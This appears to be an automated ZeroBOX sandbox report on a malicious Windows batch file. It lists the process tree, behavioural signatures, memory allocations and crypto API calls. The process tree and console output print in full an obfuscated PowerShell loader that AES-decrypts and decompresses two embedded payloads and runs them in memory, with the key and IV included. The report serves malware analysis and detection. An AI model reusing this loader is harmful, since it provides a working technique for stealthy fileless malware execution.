Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 21, 2023, 7:48 a.m.	June 21, 2023, 7:50 a.m.

Size	4.2MB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`d1fbd19d28e0545cc756ab6c61f775be`
SHA256	`1876cdf7ae380d878a12a7dda624b40f74bf470592410665103b7bd998477959`
CRC32	`14C272C3`
ssdeep	`49152:RlCMws8aK4plIA14mWk9oaOwWyuNKNkVwCJnbhZuwlyzo44CcW2jjgpcj:s`
Yara	anti_vm_detect - Possibly employs anti-virtualization techniques

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "CWbgsja" C:\Users\test22\AppData\Local\Temp\kkk_SC.bat
3044
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kkk_SC.bat
  2192
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kkk_SC.bat
    2256
    - kkk_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\kkk_SC.bat.exe" -w hidden -c $cWVj='EFSeJleFSeJmenFSeJtAFSeJtFSeJ'.Replace('FSeJ', '');$dZIP='CFSeJhFSeJangeFSeJExtFSeJenFSeJsioFSeJnFSeJ'.Replace('FSeJ', '');$SOzw='MaiFSeJnMoFSeJdFSeJuleFSeJ'.Replace('FSeJ', '');$iDET='LoFSeJaFSeJdFSeJ'.Replace('FSeJ', '');$CeaB='InvoFSeJkeFSeJ'.Replace('FSeJ', '');$bcLs='ReFSeJaFSeJdLiFSeJnesFSeJ'.Replace('FSeJ', '');$TFdr='EnFSeJtrFSeJyFSeJPoFSeJinFSeJtFSeJ'.Replace('FSeJ', '');$gkqN='TrFSeJaFSeJnsfoFSeJrFSeJmFinFSeJalBFSeJlFSeJocFSeJkFSeJ'.Replace('FSeJ', '');$bRfw='CreFSeJaFSeJtFSeJeFSeJDecrFSeJyFSeJptFSeJorFSeJ'.Replace('FSeJ', '');$UlBT='GetFSeJCuFSeJrreFSeJnFSeJtPFSeJroFSeJceFSeJssFSeJ'.Replace('FSeJ', '');$QNKP='FroFSeJmBFSeJasFSeJe6FSeJ4FSeJStrFSeJinFSeJgFSeJ'.Replace('FSeJ', '');$jAZR='SplFSeJitFSeJ'.Replace('FSeJ', '');function cPniz($bJbiy){$IQAHT=[System.Security.Cryptography.Aes]::Create();$IQAHT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IQAHT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IQAHT.Key=[System.Convert]::$QNKP('DG+ITvejSg5kAhhFMXGE41iyJquRkqJTsUyn5dcEHDA=');$IQAHT.IV=[System.Convert]::$QNKP('Joz0fUDJtUUf4xJ0M3JntQ==');$fKHZo=$IQAHT.$bRfw();$lpOTx=$fKHZo.$gkqN($bJbiy,0,$bJbiy.Length);$fKHZo.Dispose();$IQAHT.Dispose();$lpOTx;}function eyRdW($bJbiy){$OKYGT=New-Object System.IO.MemoryStream(,$bJbiy);$pEfSh=New-Object System.IO.MemoryStream;$cJnlK=New-Object System.IO.Compression.GZipStream($OKYGT,[IO.Compression.CompressionMode]::Decompress);$cJnlK.CopyTo($pEfSh);$cJnlK.Dispose();$OKYGT.Dispose();$pEfSh.Dispose();$pEfSh.ToArray();}$cqDqM=[System.Linq.Enumerable]::$cWVj([System.IO.File]::$bcLs([System.IO.Path]::$dZIP([System.Diagnostics.Process]::$UlBT().$SOzw.FileName, $null)), 1);$DZZNX=$cqDqM.Substring(2).$jAZR(':');$OIVsl=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[0])));$VMVnP=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[1])));[System.Reflection.Assembly]::$iDET([byte[]]$VMVnP).$TFdr.$CeaB($null,$null);[System.Reflection.Assembly]::$iDET([byte[]]$OIVsl).$TFdr.$CeaB($null,$null);
      2432

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA June 21, 2023, 7:46 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW June 21, 2023, 7:46 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 21, 2023, 7:46 a.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: At line:1 char:982 console_handle: 0x0000002f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: + $cWVj='EFSeJleFSeJmenFSeJtAFSeJtFSeJ'.Replace('FSeJ', '');$dZIP='CFSeJhFSeJan console_handle: 0x0000003b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: geFSeJExtFSeJenFSeJsioFSeJnFSeJ'.Replace('FSeJ', '');$SOzw='MaiFSeJnMoFSeJdFSeJ console_handle: 0x00000047	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: uleFSeJ'.Replace('FSeJ', '');$iDET='LoFSeJaFSeJdFSeJ'.Replace('FSeJ', '');$CeaB console_handle: 0x00000053	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ='InvoFSeJkeFSeJ'.Replace('FSeJ', '');$bcLs='ReFSeJaFSeJdLiFSeJnesFSeJ'.Replace console_handle: 0x0000005f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ('FSeJ', '');$TFdr='EnFSeJtrFSeJyFSeJPoFSeJinFSeJtFSeJ'.Replace('FSeJ', '');$gk console_handle: 0x0000006b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: qN='TrFSeJaFSeJnsfoFSeJrFSeJmFinFSeJalBFSeJlFSeJocFSeJkFSeJ'.Replace('FSeJ', '' console_handle: 0x00000077	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: );$bRfw='CreFSeJaFSeJtFSeJeFSeJDecrFSeJyFSeJptFSeJorFSeJ'.Replace('FSeJ', '');$ console_handle: 0x00000083	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: UlBT='GetFSeJCuFSeJrreFSeJnFSeJtPFSeJroFSeJceFSeJssFSeJ'.Replace('FSeJ', '');$Q console_handle: 0x0000008f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: NKP='FroFSeJmBFSeJasFSeJe6FSeJ4FSeJStrFSeJinFSeJgFSeJ'.Replace('FSeJ', '');$jAZ console_handle: 0x0000009b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: R='SplFSeJitFSeJ'.Replace('FSeJ', '');function cPniz($bJbiy){$IQAHT=[System.Sec console_handle: 0x000000a7	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: urity.Cryptography.Aes]::Create();$IQAHT.Mode=[System.Security.Cryptography.Cip console_handle: 0x000000b3	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: herMode]::CBC;$IQAHT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; console_handle: 0x000000bf	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: $IQAHT.Key=[System.Convert]::$QNKP( <<<< 'DG+ITvejSg5kAhhFMXGE41iyJquRkqJTsUyn5 console_handle: 0x000000cb	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: dcEHDA=');$IQAHT.IV=[System.Convert]::$QNKP('Joz0fUDJtUUf4xJ0M3JntQ==');$fKHZo= console_handle: 0x000000d7	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: $IQAHT.$bRfw();$lpOTx=$fKHZo.$gkqN($bJbiy,0,$bJbiy.Length);$fKHZo.Dispose();$IQ console_handle: 0x000000e3	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: AHT.Dispose();$lpOTx;}function eyRdW($bJbiy){$OKYGT=New-Object System.IO.Memory console_handle: 0x000000ef	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: Stream(,$bJbiy);$pEfSh=New-Object System.IO.MemoryStream;$cJnlK=New-Object Syst console_handle: 0x000000fb	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: em.IO.Compression.GZipStream($OKYGT,[IO.Compression.CompressionMode]::Decompres console_handle: 0x00000107	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: s);$cJnlK.CopyTo($pEfSh);$cJnlK.Dispose();$OKYGT.Dispose();$pEfSh.Dispose();$pE console_handle: 0x00000113	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: fSh.ToArray();}$cqDqM=[System.Linq.Enumerable]::$cWVj([System.IO.File]::$bcLs([ console_handle: 0x0000011f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: System.IO.Path]::$dZIP([System.Diagnostics.Process]::$UlBT().$SOzw.FileName, $n console_handle: 0x0000012b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ull)), 1);$DZZNX=$cqDqM.Substring(2).$jAZR(':');$OIVsl=eyRdW (cPniz ([Convert]: console_handle: 0x00000137	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: :$QNKP($DZZNX[0])));$VMVnP=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[1])));[System. console_handle: 0x00000143	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: Reflection.Assembly]::$iDET([byte[]]$VMVnP).$TFdr.$CeaB($null,$null);[System.Re console_handle: 0x0000014f	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: flection.Assembly]::$iDET([byte[]]$OIVsl).$TFdr.$CeaB($null,$null); console_handle: 0x0000015b	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x00000167	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: ecordException console_handle: 0x00000173	1	1
WriteConsoleW June 21, 2023, 7:46 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x0000017f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b90a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b90a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b90a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b90a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b90a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b90a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b94a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b94a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b94a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b95a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b97a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2023, 7:46 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9828 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 21, 2023, 7:46 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02740000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0229a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02292000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02882000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0229b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02861000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02862000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02863000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02864000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02865000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
